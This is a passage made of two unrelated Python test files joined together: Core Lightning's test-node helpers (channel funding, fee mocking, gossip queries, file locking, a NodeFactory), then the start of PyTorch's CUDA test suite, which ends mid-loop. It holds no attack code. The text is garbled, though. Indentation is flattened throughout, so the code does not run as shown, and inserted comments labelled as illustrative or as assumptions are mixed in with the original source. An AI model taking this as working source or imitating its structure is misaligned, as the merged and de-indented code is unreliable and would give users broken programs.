return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, res['outnum'])
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
blockid = self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=TIMEOUT):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
        # wait for sendpay to complete
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# Make sure they're all settled, in case we quickly mine blocks!
dst.wait_for_htlcs()
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
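    # Illustrative usage (assumption, not from the original file): push funds
    # towards a hypothetical peer l2 and record how much got through:
    #   total_sent = l1.drain(l2)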
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
        # (feerates here are sat per kiloweight; bitcoind reports BTC per kvB, so multiply by 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
        # We wait until all four levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
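    # Illustrative note (derived from the mock above; the phrasing is ours):
    # feerates[0..3] feed the 2-block CONSERVATIVE and the 6/12/100-block
    # ECONOMICAL estimates respectively, e.g.
    #   node.set_feerates((15000, 11000, 7500, 3750))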
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
                msgs.append(hmsg)
out = out[2 + length:]
return msgs
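    # Illustrative usage sketch (assumption about typical arguments): request a
    # channel range and drop any reply whose hex type prefix is in `filters`:
    #   msgs = l1.query_gossip('query_channel_range', chain_hash, 0, 1000000,
    #                          filters=['0109'])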
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
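# A minimal usage sketch of flock() (illustrative only, not part of the
# original module; the directory path is a placeholder):
def _flock_example(directory='/tmp/flock-demo'):
    with flock(directory):
        # Exactly one process at a time executes this block; waiters proceed
        # in the order their lock files were created.
        pass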
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
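# A minimal usage sketch of Throttler (illustrative only; the directory is a
# placeholder): gate process creation on system load before spawning work.
def _throttler_example(directory='/tmp/throttle-demo'):
    throttler = Throttler(directory, target=90)
    throttler.wait()  # returns once we hold the lock and the load is below target
    # ...spawn the expensive subprocess here...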
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
# Only trace one random node's plugins, to avoid OOM.
if SLOW_MACHINE:
valgrind_plugins = [False] * num_nodes
valgrind_plugins[random.randint(0, num_nodes - 1)] = True
else:
valgrind_plugins = [True] * num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts,
valgrind_plugins=valgrind_plugins[i]
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
        # Regtest fee estimates are unusable, so override them.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel, wait_for_announce waits for channel and node announcements"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
        # If we're returning now, make sure all dst nodes show the connection
        # in getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1, wait_for_mempool=txids)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
        for i, scid in enumerate(scids):
            nodes[i].wait_channel_active(scid)
            nodes[i + 1].wait_channel_active(scid)
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
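# Illustrative sketch (assumption, not part of the original module): how the
# factory above is typically consumed from a test via a node_factory fixture.
def _example_line_graph_usage(node_factory):
    # Three nodes connected l1 <-> l2 <-> l3 with funded, announced channels.
    l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
    assert l1.channel_state(l2) == 'CHANNELD_NORMAL'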
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
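# Illustrative call of the helper above (the legacy constructor name is an
# assumption): a 5x5 sparse CUDA tensor with 10 random non-zero entries.
#   make_sparse_tensor(torch.cuda.sparse.FloatTensor, 10, 5, 5)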
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
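# A small helper sketch built on get_cycles_per_ms() (illustrative only, not
# used by the tests below): spin the current CUDA stream for roughly `ms`
# milliseconds; torch.cuda._sleep takes a cycle count.
def _spin_for_ms(ms):
    torch.cuda._sleep(int(ms * get_cycles_per_ms()))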
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
                # They can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
            # emptying the cache may happen (due to allocation or empty_cache), so
            # we can't assert new_r >= last_r
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
        # Testing the behaviour with no argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
        # Testing the behaviour with no argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
        # advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
